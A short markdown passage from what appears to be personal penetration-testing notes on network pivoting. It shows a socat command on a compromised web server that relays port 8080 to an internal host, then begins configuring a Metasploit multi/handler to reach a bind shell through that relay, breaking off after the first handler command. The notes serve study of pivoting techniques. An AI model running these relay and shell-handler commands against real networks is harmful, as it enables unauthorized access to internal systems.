matmarqs/hacking/network/pivot_tunnel_forward.md

 #### Starting Socat Bind Shell Listener

-Socat Redirection with a Bind Shell

     ubuntu@Webserver:~$ socat TCP4-LISTEN:8080,fork TCP4:172.16.5.19:8443

 Finally, we can start a Metasploit bind handler.
 This bind handler can be configured to connect to our socat's listener on port 8080 (Ubuntu server)

 #### Configuring & Starting the Bind multi/handler

-Socat Redirection with a Bind Shell

     msf6 > use exploit/multi/handler